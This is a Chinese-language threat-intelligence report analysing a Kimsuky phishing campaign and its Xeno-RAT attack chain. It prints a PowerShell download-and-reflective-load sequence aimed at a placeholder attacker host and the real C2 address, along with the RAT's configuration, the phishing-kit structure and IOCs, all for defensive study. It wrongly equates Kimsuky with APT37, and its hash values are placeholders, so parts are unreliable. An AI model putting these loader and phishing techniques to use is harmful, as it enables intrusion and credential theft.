Kimsuky组织钓鱼活动与Xeno-RAT木马攻击链深度分析

概述

Kimsuky组织（又称APT37、Reaper）近期针对美国和韩国目标发起了一场复杂的钓鱼攻击活动。攻击者使用精心设计的钓鱼邮件结合Xeno-RAT远控木马构建了完整的攻击链。本文将从技术角度详细剖析此次攻击活动的各个组件及其运作机制。

木马攻击链分析

攻击组件

1. view.txt - PowerShell脚本

   • 功能：从攻击者服务器下载加密的xeno.bin文件并解密执行
   • 下载路径：/xrat/xeno.bin
   • 解密算法：自定义解密函数

2. xeno.bin - 加密的Xeno-RAT远控木马

   • 解密后为.NET程序
   • C2服务器：152.32.243.152:4444
   • 基于开源项目：https://github.com/moom825/xeno-rat

同源对比

与深信服2024年1月报告《Kimsuky组织利用Dropbox云端实施行动分析》中提到的攻击活动存在明显同源关系：

• PowerShell脚本注释内容高度相似
• 使用相同的Xeno-RAT变种
• 相似的攻击手法

PowerShell脚本分析

外联下载加密xeno.bin文件

# 示例代码（简化）
$url = "http://attacker-domain/xrat/xeno.bin"
$bytes = (New-Object Net.WebClient).DownloadData($url)

解密xeno.bin文件

解密函数逻辑：

1. 读取加密文件字节流
2. 应用自定义解密算法
3. 输出解密后的有效载荷

手动解密方法（研究人员修改后的脚本片段）：

$path = "C:\\Users\\admin\\Desktop\\xeno.bin"
$bytes = [System.IO.File]::ReadAllBytes($path)
$length = $bytes.Length
$length = Decode-Binary ($bytes) ($length)
Set-Content -Path "output.bin" -Value $bytes -Encoding Byte

动态加载解密后的xeno.bin

加载流程：

1. 反射加载解密后的程序集
2. 调用setServerIp函数配置C2地址
3. 调用Main函数启动远控功能

关键代码：

[Reflection.Assembly]::Load($decryptedBytes)
$type = $assembly.GetType("Xeno.RAT")
$method = $type.GetMethod("setServerIp")
$method.Invoke($null, @("152.32.243.152:4444"))
$method = $type.GetMethod("Main")
$method.Invoke($null, @())

Xeno-RAT技术细节

配置信息

// 示例配置
string ServerIP = "152.32.243.152";
int Port = 4444;
string Version = "1.0.0";
string Mutex = "XenoRAT_Mutex";
bool AntiVM = true;

通信加解密机制

加密流程：

1. 使用AES加密数据
2. 调用ntdll.dll的RtlCompressBuffer压缩数据

解密流程：

1. 调用ntdll.dll的RtlDecompressBuffer解压数据
2. 使用AES解密数据

关键API导入：

[DllImport("ntdll.dll")]
public static extern uint RtlCompressBuffer(
    ushort CompressionFormat,
    byte[] SourceBuffer,
    int SourceLength,
    byte[] DestinationBuffer,
    int DestinationLength,
    int Unknown,
    out int DestinationSize,
    IntPtr WorkspaceBuffer);

[DllImport("ntdll.dll")]
public static extern uint RtlDecompressBuffer(
    ushort CompressionFormat,
    byte[] DestinationBuffer,
    int DestinationLength,
    byte[] SourceBuffer,
    int SourceLength,
    out int DestinationSize);

远控功能

通过插件DLL实现模块化功能：

• 键盘记录
• 屏幕捕获
• 文件管理
• 进程操作
• 持久化维持

钓鱼邮件分析

技术组件

1. PHPMailer库

   • 版本：6.9.1
   • 功能：发送钓鱼邮件
   • 项目地址：https://github.com/PHPMailer/PHPMailer

2. 发件页面

   • test.php/test1.php/test2.php
   • 默认配置：
     • 邮件服务器：mail.naver.com
     • 发件人伪装：no-reply@sisileae.com
     • 主题：[Naver] 关于电子邮件发送和接收功能限制的通知

钓鱼页面

1. deletegoogle.html/deletekakao.html

   • 功能：跳转至伪造的Naver登录页面
   • 目标：窃取Naver账号凭据
   • 跳转URL：https://nid.naver.com/nidlogin.login?url=https://mail.naver.com/

2. 内置钓鱼URL结构

   nid.oksite.eu/nidlogin.login?mode=form&url=https%3A%2F%2Fwww.naver.com
   &otp=&rtnurl=aHR0cHM6Ly9uaWQub2tzaXRlLmV1L3VzZXIyL2hlbHAvbXlJbmZvP209dmlld0NoYW5nZVBhc3N3ZCZsYW5nPWtv
   

   解码后重定向至：

   nid.oksite.eu/user2/help/myInfo?m=viewChangePasswd&lang=ko
   

钓鱼邮件日志分析

疑似被钓鱼IP分析

疑似被钓鱼邮箱凭证

密码加密方式：与Kakao账户登录使用的相同编码算法

防御建议

1. 钓鱼邮件防护

   • 警惕来自"no-reply@sisileae.com"的邮件
   • 注意检查邮件头信息，特别是发件服务器和跳转URL
   • 对员工进行钓鱼意识培训

2. 恶意脚本防护

   • 禁用不必要的PowerShell执行策略
   • 监控异常的PowerShell活动
   • 限制从互联网下载和执行脚本

3. Xeno-RAT检测

   • 监控对152.32.243.152:4444的连接尝试
   • 检测ntdll.dll的RtlCompressBuffer/RtlDecompressBuffer异常调用
   • 查找内存中的"XenoRAT_Mutex"互斥体

4. 网络防护

   • 阻止访问nid.oksite.eu相关域名
   • 监控对/xrat/、/send/、/accounts/等路径的访问

5. 日志监控

   • 记录和分析异常的用户认证活动
   • 监控密码修改等敏感操作

IOCs（入侵指标）

域名：

• nid.oksite.eu

IP地址：

• 152.32.243.152

URL：

• http://[attacker-domain]/xrat/view.txt
• http://[attacker-domain]/xrat/xeno.bin
• http://[attacker-domain]/send/test.php

文件哈希（示例）：

• view.txt: SHA256 [需根据实际样本计算]
• xeno.bin: SHA256 [需根据实际样本计算]

互斥体：

• XenoRAT_Mutex

总结

Kimsuky组织的此次攻击活动展示了高级持续性威胁(APT)的典型特征：

1. 使用精心设计的钓鱼邮件作为初始入侵载体
2. 部署多阶段恶意载荷（PowerShell脚本+Xeno-RAT）
3. 利用合法基础设施（如Naver）增强钓鱼可信度
4. 采用成熟的远控工具并自定义修改
5. 针对特定地区（美韩）的高价值目标

安全团队应密切关注此类攻击模式，及时更新检测规则，加强对PowerShell活动和异常网络连接的监控。